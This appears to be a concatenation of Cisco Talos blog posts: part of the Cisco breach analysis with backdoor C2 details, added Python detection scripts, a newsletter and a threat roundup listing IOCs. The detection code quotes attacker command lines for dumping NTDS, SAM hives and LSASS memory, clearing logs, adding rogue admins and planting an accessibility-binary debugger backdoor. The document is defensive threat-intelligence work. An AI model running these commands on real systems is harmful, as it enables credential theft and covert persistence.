The actor dropped a series of payloads onto systems, which we continue to analyze. The first payload is a simple backdoor that takes commands from a command and control (C2) server and executes them on the end system via the Windows Command Processor. The commands are sent in JSON blobs and are standard for a backdoor. There is a “DELETE_SELF” command that removes the backdoor from the system completely. Another, more interesting, command, “WIPE”, instructs the backdoor to remove the last executed command from memory, likely with the intent of negatively impacting forensic analysis on any impacted hosts. 

Commands are retrieved by making HTTP GET requests to the C2 server using the following structure: 
/bot/cmd.php?botid=%.8x
The malware also communicates with the C2 server via HTTP GET requests that feature the following structure: 
/bot/gate.php?botid=%.8x
Following the initial request from the infected system, the C2 server responds with a SHA256 hash. We observed additional requests made every 10 seconds.  

The aforementioned HTTP requests are sent using the following user-agent string: 
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.36 Trailer/95.3.1132.33
The malware also creates a file called “bdata.ini” in the malware’s current working directory that contains a value derived from the volume serial number present on the infected system. In instances where this backdoor was executed, the malware was observed running from the following directory location:  
C:\users\public\win\cmd.exe
The attacker was frequently observed staging tooling in directory locations under the Public user profile on systems from which they were operating.  

Based upon analysis of C2 infrastructure associated with this backdoor, we assess that the C2 server was set up specifically for this attack. 
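As an added example (not code from the Talos post), the following Python detection parses constructed proxy-style log lines and flags the request structure, the user-agent string and the 10-second polling cadence described above; the C2 hostname c2.example.invalid, the client addresses and the botid values are placeholders.

```python
"""Detection for the backdoor's C2 traffic pattern described above.

Added example, not code from the Talos post. It parses constructed
proxy-style log lines and flags (a) GET requests whose path matches the
/bot/cmd.php and /bot/gate.php structure with an 8-hex-digit botid,
(b) the documented user-agent string, and (c) a client polling one host
at the documented ~10-second cadence. The host c2.example.invalid, the
client addresses and the botid values are placeholders.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# User-agent string quoted above; the trailing "Trailer/..." token is not part
# of a standard Edge user agent, so an exact match is a strong signal.
C2_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
         "(KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 "
         "Edg/99.0.1150.36 Trailer/95.3.1132.33")

# /bot/cmd.php?botid=%.8x (command poll) and /bot/gate.php?botid=%.8x
# (check-in); %.8x is eight lowercase hex digits.
C2_PATH_RE = re.compile(r"^/bot/(cmd|gate)\.php\?botid=[0-9a-f]{8}$")

# Constructed log format: <iso-time> <client-ip> <method> <url> "<user-agent>"
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


def parse_line(line: str) -> Optional[dict]:
    """Parse one log line into a record, or None if it does not fit the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, src, method, url, ua = m.groups()
    u = urlsplit(url)
    return {
        "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
        "src": src, "method": method, "host": u.netloc,
        "path": u.path + ("?" + u.query if u.query else ""), "ua": ua,
    }


def c2_indicators(rec: dict) -> List[str]:
    """Per-request indicators; either one on its own is worth an alert."""
    reasons = []
    if rec["method"] == "GET" and C2_PATH_RE.match(rec["path"]):
        reasons.append("c2_path_structure")
    if rec["ua"] == C2_UA:
        reasons.append("c2_user_agent")
    return reasons


def beacon_cadence(records: List[dict], expected: float = 10.0,
                   tolerance: float = 1.0, min_requests: int = 4) -> Dict[Tuple[str, str], float]:
    """(client, host) pairs polled at a near-constant interval close to `expected`
    seconds, mapped to the median interval. This catches the cadence even if the
    path or user agent changes in a later build of the backdoor."""
    by_pair: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for r in records:
        by_pair[(r["src"], r["host"])].append(r["ts"])
    result: Dict[Tuple[str, str], float] = {}
    for pair, times in by_pair.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        med = statistics.median(gaps)
        if abs(med - expected) <= tolerance and all(abs(g - med) <= tolerance for g in gaps):
            result[pair] = med
    return result


def analyze(lines: List[str]):
    """Parse log lines; return per-request C2 hits and the beaconing clients."""
    records = [r for r in map(parse_line, lines) if r]
    hits = [(r["src"], r["path"], c2_indicators(r)) for r in records if c2_indicators(r)]
    return hits, beacon_cadence(records)


# Constructed sample: one infected client checks in via gate.php, then polls
# cmd.php every 10 seconds; two benign requests for contrast.
SAMPLE_LOG = [
    f'2022-08-01T12:00:00Z 10.20.30.40 GET http://c2.example.invalid/bot/gate.php?botid=1a2b3c4d "{C2_UA}"',
    f'2022-08-01T12:00:10Z 10.20.30.40 GET http://c2.example.invalid/bot/cmd.php?botid=1a2b3c4d "{C2_UA}"',
    f'2022-08-01T12:00:20Z 10.20.30.40 GET http://c2.example.invalid/bot/cmd.php?botid=1a2b3c4d "{C2_UA}"',
    f'2022-08-01T12:00:30Z 10.20.30.40 GET http://c2.example.invalid/bot/cmd.php?botid=1a2b3c4d "{C2_UA}"',
    f'2022-08-01T12:00:40Z 10.20.30.40 GET http://c2.example.invalid/bot/cmd.php?botid=1a2b3c4d "{C2_UA}"',
    '2022-08-01T12:00:05Z 10.20.30.41 GET https://www.example.com/index.html '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
    'Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.36"',
    '2022-08-01T12:00:07Z 10.20.30.41 GET http://intranet.example.com/bot/cmd.php?botid=notahexid "curl/7.83.1"',
]

if __name__ == "__main__":
    hits, cadence = analyze(SAMPLE_LOG)
    for src, path, reasons in hits:
        print(src, path, ",".join(reasons))
    print(cadence)
```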


Attack attribution


Based upon artifacts obtained, tactics, techniques, and procedures (TTPs) identified, infrastructure used, and a thorough analysis of the backdoor utilized in this attack, we assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to both UNC2447 and Lapsus$. IABs typically attempt to obtain privileged access to corporate network environments and then monetize that access by selling it to other threat actors who can then leverage it for a variety of purposes. We have also observed previous activity linking this threat actor to the Yanluowang ransomware gang, including the use of the Yanluowang data leak site for posting data stolen from compromised organizations. 

UNC2447 is a financially-motivated threat actor with a nexus to Russia that has been previously observed conducting ransomware attacks and leveraging a technique known as “double extortion,” in which data is exfiltrated prior to ransomware deployment in an attempt to coerce victims into paying ransom demands. Prior reporting indicates that UNC2447 has been observed operating a variety of ransomware, including FIVEHANDS, HELLOKITTY, and more. 

Apart from UNC2447, some of the TTPs discovered during the course of our investigation match those of Lapsus$. Lapsus$ is a threat actor group that is reported to have been responsible for several previous notable breaches of corporate environments. Several arrests of Lapsus$ members were reported earlier this year. Lapsus$ has been observed compromising corporate environments and attempting to exfiltrate sensitive information. 

While we did not observe ransomware deployment in this attack, the TTPs used were consistent with “pre-ransomware activity,” activity commonly observed leading up to the deployment of ransomware in victim environments. Many of the TTPs observed are consistent with activity observed by Cisco Talos Incident Response (CTIR) during previous engagements. Our analysis also suggests reuse of server-side infrastructure associated with these previous engagements. In previous engagements, we also did not observe deployment of ransomware in the victim environments. 


Cisco response and recommendations


Cisco implemented a company-wide password reset immediately upon learning of the incident. CTIR previously observed similar TTPs in numerous investigations since 2021. Our findings and subsequent security protections resulting from those customer engagements helped us slow and contain the attacker’s progression. We created two ClamAV signatures, which are listed below.  

  • Win.Exploit.Kolobko-9950675-0  
  • Win.Backdoor.Kolobko-9950676-0 

Threat actors commonly use social engineering techniques to compromise targets, and despite the frequency of such attacks, organizations continue to face challenges mitigating those threats. User education is paramount in thwarting such attacks, including making sure employees know the legitimate ways that support personnel will contact users so that employees can identify fraudulent attempts to obtain sensitive information. 

Given the actor’s demonstrated proficiency in using a wide array of techniques to obtain initial access, user education is also a key part of countering MFA bypass techniques. Equally important to implementing MFA is ensuring that employees are educated on what to do and how to respond if they get errant push requests on their respective phones. It is also essential to educate employees about who to contact if such incidents do arise to help determine if the event was a technical issue or malicious. 

For Duo, it is beneficial to implement strong device verification by enforcing stricter controls around device status to limit or block enrollment and access from unmanaged or unknown devices. Additionally, leveraging risk detection to highlight events like a brand-new device being used from an unrealistic location, or attack patterns like brute-force logins, can help detect unauthorized access.

Prior to allowing VPN connections from remote endpoints, ensure that posture checking is configured to enforce a baseline set of security controls. This ensures that the connecting devices match the security requirements present in the environment. This can also prevent rogue devices that have not been previously approved from connecting to the corporate network environment. 

Network segmentation is another important security control that organizations should employ, as it provides enhanced protection for high-value assets and also enables more effective detection and response capabilities in situations where an adversary is able to gain initial access into the environment.  

Centralized log collection can help minimize the lack of visibility that results when an attacker takes active steps to remove logs from systems. Ensuring that the log data generated by endpoints is centrally collected and analyzed for anomalous or overtly malicious behavior can provide early indication when an attack is underway.  

In many cases, threat actors have been observed targeting the backup infrastructure in an attempt to further remove an organization’s ability to recover following an attack. Ensuring that backups are offline and periodically tested can help mitigate this risk and ensure an organization’s ability to effectively recover following an attack. 

Auditing of command line execution on endpoints can also provide increased visibility into actions being performed on systems in the environment and can be used to detect suspicious execution of built-in Windows utilities, which is commonly observed during intrusions where threat actors rely on benign applications or utilities already present in the environment for enumeration, privilege escalation, and lateral movement activities.  
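As an added example that is not Cisco's own tooling, the following Python detection rules cover the command lines quoted in the post-compromise TTPs section above and the command-line auditing recommended in this paragraph; the hostnames, LSASS PID and user profile name in the sample events are constructed placeholders, and the accessibility-binary list extends the sethc.exe and narrator.exe keys to the other logon-screen helpers that share the same IFEO trick.

```python
"""Detection rules for the command-line TTPs quoted in this post.

Added example, not Cisco's own tooling. Each rule is a regex over a
normalized process command line, as recorded by Windows Security event
4688 or Sysmon Event ID 1 when command-line auditing is enabled. The
sample events are constructed from the commands quoted above; hostnames,
the LSASS PID and the user profile name are placeholders.
"""
import re
from typing import Dict, List, Tuple

Event = Tuple[str, str]  # (hostname, full command line)

# Rule name -> pattern matched against the lowercased, whitespace-collapsed
# command line. The accessibility-binary list generalizes the sethc.exe and
# narrator.exe IFEO keys quoted above to the other logon-screen helpers.
RULES: Dict[str, re.Pattern] = {
    "ntds_dump_ifm": re.compile(r"ntdsutil(\.exe)?\b.*\bifm\b.*\bcreate full\b"),
    "registry_hive_save": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b"),
    "lsass_minidump_comsvcs": re.compile(r"rundll32(\.exe)?\b.*comsvcs\.dll,?\s*minidump\b"),
    "event_log_clear": re.compile(r"\bwevtutil(\.exe)?\s+cl\b"),
    "local_user_add": re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+(\s+\S+)?\s+/add\b"),
    "local_admin_group_add": re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b"),
    "local_user_delete": re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+/delete\b"),
    "rdp_firewall_enable": re.compile(
        r'netsh\s+advfirewall\s+firewall\s+set\s+rule\s+group="?remote desktop"?\s+new\s+enable=yes'),
    "ifeo_accessibility_debugger": re.compile(
        r"image file execution options\\(sethc|narrator|utilman|osk|magnify|displayswitch|atbroker)\.exe"
        r".*\bdebugger\b"),
    "remote_access_tool_msi": re.compile(r"msiexec(\.exe)?\s+/i\s+.*\\(logmein|teamviewer)[^\\\s]*\.msi"),
}


def normalize(cmdline: str) -> str:
    """Lowercase and collapse whitespace so spacing tricks do not dodge a rule."""
    return " ".join(cmdline.lower().split())


def match_rules(cmdline: str) -> List[str]:
    """Names of every rule that fires on a single command line."""
    norm = normalize(cmdline)
    return [name for name, pat in RULES.items() if pat.search(norm)]


def scan_events(events: List[Event]) -> List[Tuple[str, str, str]]:
    """Run every rule over every event; returns (host, rule, cmdline) hits in order."""
    return [(host, rule, cmd) for host, cmd in events for rule in match_rules(cmd)]


# Stage -> pattern capturing the account name, for the create / elevate / delete
# sequence around the "z" account described above.
ACCOUNT_STAGES: Dict[str, re.Pattern] = {
    "created": re.compile(r"\bnet1?(\.exe)?\s+user\s+(?P<acct>\S+)(\s+\S+)?\s+/add\b"),
    "elevated": re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+(?P<acct>\S+)\s+/add\b"),
    "deleted": re.compile(r"\bnet1?(\.exe)?\s+user\s+(?P<acct>\S+)\s+/delete\b"),
}


def rogue_admin_accounts(events: List[Event]) -> Dict[Tuple[str, str], List[str]]:
    """Per (host, account): stages seen, kept only when the account was both created
    and added to Administrators; a later 'deleted' stage is the cleanup step."""
    stages: Dict[Tuple[str, str], List[str]] = {}
    for host, cmd in events:
        norm = normalize(cmd)
        for stage, pat in ACCOUNT_STAGES.items():
            m = pat.search(norm)
            if m:
                stages.setdefault((host, m.group("acct")), []).append(stage)
    return {k: v for k, v in stages.items() if {"created", "elevated"} <= set(v)}


# Constructed audit events modelled on the commands quoted in this post.
SAMPLE_EVENTS: List[Event] = [
    ("dc01", "powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\users\\public' q q"),
    ("ctx02", "C:\\Windows\\system32\\net user z Lh199211* /add"),
    ("ctx02", "C:\\Windows\\system32\\net localgroup administrators z /add"),
    ("ctx02", "reg save hklm\\sam sam"),
    ("ctx02", "rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump 712 C:\\windows\\temp\\lsass.dmp full"),
    ("ctx02", "wevtutil.exe cl Security"),
    ("ctx02", "net user z /delete"),
    ("ws07", "netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes"),
    ("ws07", "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"
             "\\sethc.exe\" /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f"),
    ("ws07", "C:\\Windows\\System32\\msiexec.exe /i C:\\Users\\jdoe\\Pictures\\LogMeIn.msi"),
    ("ws07", "C:\\Windows\\System32\\svchost.exe -k netsvcs -p"),  # benign; no rule should fire
]

if __name__ == "__main__":
    for host, rule, cmd in scan_events(SAMPLE_EVENTS):
        print(f"{host:6} {rule:28} {cmd}")
    print(rogue_admin_accounts(SAMPLE_EVENTS))
```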


Mitre ATT&CK mapping


All of the previously described TTPs that were observed in this attack are listed below based on the phase of the attack in which they occurred. 

Initial Access 


Execution 


Persistence 


Privilege Escalation 


Defense Evasion 


Credential Access 


Lateral Movement 


Discovery 


Command and Control 


Exfiltration 




Indicators of compromise


The following indicators of compromise were observed associated with this attack. 

Hashes (SHA256) 


IP Addresses 


Domains 


Email Addresses 

costacancordia[@]protonmail[.]com 





Threat Source newsletter (Aug. 11, 2022) — All of the things-as-a-service

11 August 2022 at 18:00

By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

Everyone seems to want to create the next “Netflix” of something. Xbox’s Game Pass is the “Netflix of video games.” Rent the Runway is a “Netflix of fashion” where customers subscribe to a rotation of fancy clothes. 

And now threat actors are looking to be the “Netflix of malware.” All categories of malware have some sort of "as-a-service" twist now. Some of the largest ransomware groups in the world operate “as a service,” allowing smaller groups to pay a fee in exchange for using the larger group’s tools.  

Our latest report on information-stealers points out that “infostealers as-a-service" are growing in popularity, and our researchers also discovered a new “C2 as-a-service" platform where attackers can pay to have this third-party site act as their command and control. And like Netflix, this Dark Utilities site offers several other layers of tools and malware to choose from. This is a particularly scary trend to me because of how easy — relatively speaking — this makes things for anyone with a basic knowledge of computers to carry out a cyber attack. Netflix made it easy for people like my Grandma to find everything she needs in one place to watch anything from throwback shows like “Knight Rider” to the live action of “Shrek: The Musical” and everything in between.  

How much longer before anyone with access to the internet can log into a singular dark web site and surf for whatever they’re in the mood for that day? As someone who has spent zero time on the actual dark web, this may already exist and I don’t even know about it, but maybe a threat actor will one day be smart enough to make a website that looks as sleek as Netflix so you can scroll through suggestions and hand-pick the Redline information-stealer followed up by a relaxing evening of ransomware from Conti.  

With everything going “as a service” it means I don’t necessarily have to have the coding skills to create my own bespoke malware. So long as I have the cash, I could conceivably buy an out-of-the-box tool online and deploy it against whoever I want.  

This is not necessarily as easy as picking a show on Netflix. But it’s not a huge leap to look at the skills gap Netflix closes by allowing my Grandma to surf for any show she wants without having to scroll through cable channels or drive to the library to check out a DVD, and someone who knows how to use PowerShell being able to launch an “as-a-service" ransomware attack.  

I have no idea what the easy solution is here aside from all the traditional forms of detection and prevention we preach. Outside of direct law enforcement intervention, there are few ways to take these “as a service” platforms offline. Maybe that just means we need to start working on the “Netflix of cybersecurity tools.” 
  

The one big thing 


Historically, cybercrime was considered white-collar criminal behavior perpetrated by those who were knowledgeable and turned bad. Now, technology has become such an integral part of our lives that anyone with a smartphone and desire can get started in cybercrime. The growth of cryptocurrencies and associated anonymity, whether legitimate or not, has garnered the attention of criminals that formerly operated in traditional criminal enterprises and have now shifted to cybercrime and identity theft. New research from Talos indicates that small-time criminals are increasingly taking part in online crime like phishing, credit card scams and more rather than traditional “hands-on” crime. 

Why do I care? 

Everyone panics when the local news shows a graph with “violent crime” increasing in our respective areas. So we should be just as worried about the increase in cybercrime over the past few years, and the potential for it to grow. As mentioned above, “as a service” malware offerings have made it easier for anyone with internet access to carry out a cyber attack and deploy ransomware or just try to scam someone out of a few thousand dollars.  

So now what? 

Law enforcement, especially at the local level, is going to need to evolve along with the criminals as they are tasked with protecting the general public. The future criminal is going to be aware of operational security and technologies like Tor to make their arrests increasingly difficult. This is just as good a time as any to remember to talk to your family about cybersecurity and internet safety. Remind family members about common types of scams like the classic “I’m in the hospital and need money.” 

 

Other news of note


Microsoft Patch Tuesday was headlined by another zero-day vulnerability in the Microsoft Support Diagnostics Tool (MSDT). CVE-2022-35743 and CVE-2022-34713 are remote code execution vulnerabilities in MSDT. However, only CVE-2022-34713 has been exploited in the wild, and Microsoft considers it “more likely” to be exploited. MSDT was already the target of the so-called “Follina” zero-day vulnerability in June. In all, Microsoft patched more than 120 vulnerabilities across all its products. Adobe also released updates to fix 25 vulnerabilities on Tuesday, mainly in Adobe Acrobat Reader. One critical vulnerability could lead to arbitrary code execution and memory leak. (Talos blog, Krebs on Security, SecurityWeek)

Some of the U.K.’s 111 services were disrupted earlier this week after a suspected cyber attack against its managed service provider. The country’s National Health System warned residents that some emergency calls could be delayed and others could not schedule health appointments. Advance, the target of the attack, said it was investigating the potential theft of patient data. As of Thursday morning, at least nine NHS mental health trusts could face up to three weeks without access to vulnerable patients’ records, though the incident has been “contained.” (SC Magazine, Bloomberg, The Guardian)

An 18-year-old and her mother are facing charges in Nebraska over an alleged medicated abortion based on information obtained from Facebook messages. Court records indicate state law enforcement submitted a search warrant to Meta, the parent company of Facebook, demanding all private data, including messages, that the company had for the two people charged. The contents of those messages were then used as the basis of a second search warrant, in which additional computers and devices were confiscated. Although the investigation began before the U.S. Supreme Court’s reversal of Roe v. Wade, the case highlights a renewed focus on digital privacy and data storage. (Vice, CNN)

Can’t get enough Talos? 


Upcoming events where you can find Talos 


USENIX Security '22 (Aug. 10 - 12, 2022) 
Las Vegas, Nevada 

DEF CON (Aug. 11 - 14, 2022) 
Las Vegas, Nevada 

Virtual 

Most prevalent malware files from Talos telemetry over the past week  


SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 2c8ea737a232fd03ab80db672d50a17a    
Typical Filename: LwssPlayer.scr    
Claimed Product: 梦想之巅幻灯播放器    
Detection Name: Auto.125E12.241442.in02    

MD5: a087b2e6ec57b08c0d0750c60f96a74c     
Typical Filename: AAct.exe     
Claimed Product: N/A       
Detection Name: PUA.Win.Tool.Kmsauto::1201  

MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A   
Detection Name: PUA.Win.Dropper.Generic::1201  

MD5: 311d64e4892f75019ee257b8377c723e  
Typical Filename: ultrasurf-21-32.exe  
Claimed Product: N/A    
Detection Name: W32.DFC.MalParent 

Threat Roundup for August 5 to August 12

12 August 2022 at 20:12

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 5 and Aug. 12. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Dropper.Tofsee-9960568-0 | Dropper | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the size of the botnet under the operator's control.
Win.Dropper.TrickBot-9960840-0 | Dropper | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Trojan.Zusy-9960880-0 | Trojan | Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Dropper.DarkComet-9961766-1 | Dropper | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. This malware can download files from a user's machine and has mechanisms for persistence and hiding. It also has the ability to send back usernames and passwords from the infected system.
Win.Ransomware.TeslaCrypt-9960924-0 | Ransomware | TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransom, and eventually, the malware developers released the master key, allowing all encrypted files to be recovered easily.
Win.Virus.Xpiro-9960895-1 | Virus | Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Dropper.Emotet-9961142-0 | Dropper | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Remcos-9961392-0 | Dropper | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Ramnit-9961396-0 | Dropper | Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It also has the ability to steal browser cookies and attempts to hide from popular antivirus software.

Threat Breakdown

Win.Dropper.Tofsee-9960568-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
Registry Key | Value Name | Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES | Config4 | 3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES |  | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | LanguageList | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-100 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-101 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-103 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\dhcpqec.dll,-102 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-1 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-2 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-4 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\napipsec.dll,-3 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-100 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-101 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-102 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\tsgqec.dll,-103 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\eapqec.dll,-100 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\eapqec.dll,-101 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\eapqec.dll,-102 | 3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E | @%SystemRoot%\system32\eapqec.dll,-103 | 3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES | Config0 | 3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES | Config1 | 3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES | Config2 | 3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES | Config3 | 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV | ErrorControl | 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV | DisplayName | 1

Mutex | Occurrences
Global\27a1e0c1-13fc-11ed-9660-001517101edf | 1
Global\30977501-13fc-11ed-9660-001517215b93 | 1

IP Address contacted by malware (does not indicate maliciousness) | Occurrences
216[.]146[.]35[.]35 | 3
31[.]13[.]65[.]174 | 3
142[.]251[.]40[.]196 | 3
96[.]103[.]145[.]165 | 3
31[.]41[.]244[.]82 | 3
31[.]41[.]244[.]85 | 3
80[.]66[.]75[.]254 | 3
80[.]66[.]75[.]4 | 3
31[.]41[.]244[.]128 | 3
31[.]41[.]244[.]126/31 | 3
208[.]76[.]51[.]51 | 2
74[.]208[.]5[.]20 | 2
208[.]76[.]50[.]50 | 2
202[.]137[.]234[.]30 | 2
212[.]77[.]101[.]4 | 2
193[.]222[.]135[.]150 | 2
203[.]205[.]219[.]57 | 2
47[.]43[.]18[.]9 | 2
67[.]231[.]144[.]94 | 2
188[.]125[.]72[.]74 | 2
40[.]93[.]207[.]0/31 | 2
205[.]220[.]176[.]72 | 2
135[.]148[.]130[.]75 | 2
121[.]53[.]85[.]11 | 2
67[.]195[.]204[.]72/30 | 1
*See JSON for more IOCs

Domain Name contacted by malware (does not indicate maliciousness) | Occurrences
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net | 3
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org | 3
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net | 3
249[.]5[.]55[.]69[.]in-addr[.]arpa | 3
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org | 3
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org | 3
microsoft-com[.]mail[.]protection[.]outlook[.]com | 3
microsoft[.]com | 3
www[.]google[.]com | 3
www[.]instagram[.]com | 3
comcast[.]net | 3
mx1a1[.]comcast[.]net | 3
jotunheim[.]name | 3
niflheimr[.]cn | 3
whois[.]arin[.]net | 2
whois[.]iana[.]org | 2
mx-eu[.]mail[.]am0[.]yahoodns[.]net | 2
aspmx[.]l[.]google[.]com | 2
mta5[.]am0[.]yahoodns[.]net | 2
icloud[.]com | 2
cox[.]net | 2
walla[.]com | 2
hanmail[.]net | 2
allstate[.]com | 2
wp[.]pl | 2
*See JSON for more IOCs

File or directory created | Occurrences
%SystemRoot%\SysWOW64\config\systemprofile | 3
%SystemRoot%\SysWOW64\config\systemprofile:.repos | 3
%SystemRoot%\SysWOW64\fnwisxtv | 1
%SystemRoot%\SysWOW64\airdnsoq | 1
%SystemRoot%\SysWOW64\uclxhmik | 1
%TEMP%\dnyabinr.exe | 1
%TEMP%\lcxykqya.exe | 1
%TEMP%\qzguacfj.exe | 1

File Hashes

098ad43e2067c5c814cebe1fc52bdc528289c6a2cc96daf4e8bac90d1c95a0b3 2240525bf4ee830766ec33e2e3c0dfcdf871748088fcf068770fd306940c5957 693cd93fbc6bfb587ad011477ae870805725c5403260621a290f61bb0d243f47 a6b68aa5d00739401b413ed936526ea5e767824fddb4e768e03fb05dc369a6fd b9820bc7b09bfa88556efac463b7459d2f4a47f06cc953529a9782fdbefd4959 c2cb05d50c06d9ed65a7c53fb2f6b7977f2988f5fbbd928266bb8ea27723b243 d6df88c6f61812a4bb662abb8d90fb4ba7e17ae5b9351251d001b7945d7aae98 ec745df5a9e65776f76b97e9685ad86fbb130bb6a3146a7823bd94c7c6502f1d f3e93f62b4f4699a3d20e85fa3c9e8b7eb9129a15ca66720d4f677cae0c5a469 f8a2e41ea8ca0e998bcd54d8256cb538b1e32cec4e80eb810e8df003427b886b

Coverage

Product | Protection
Secure Endpoint | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
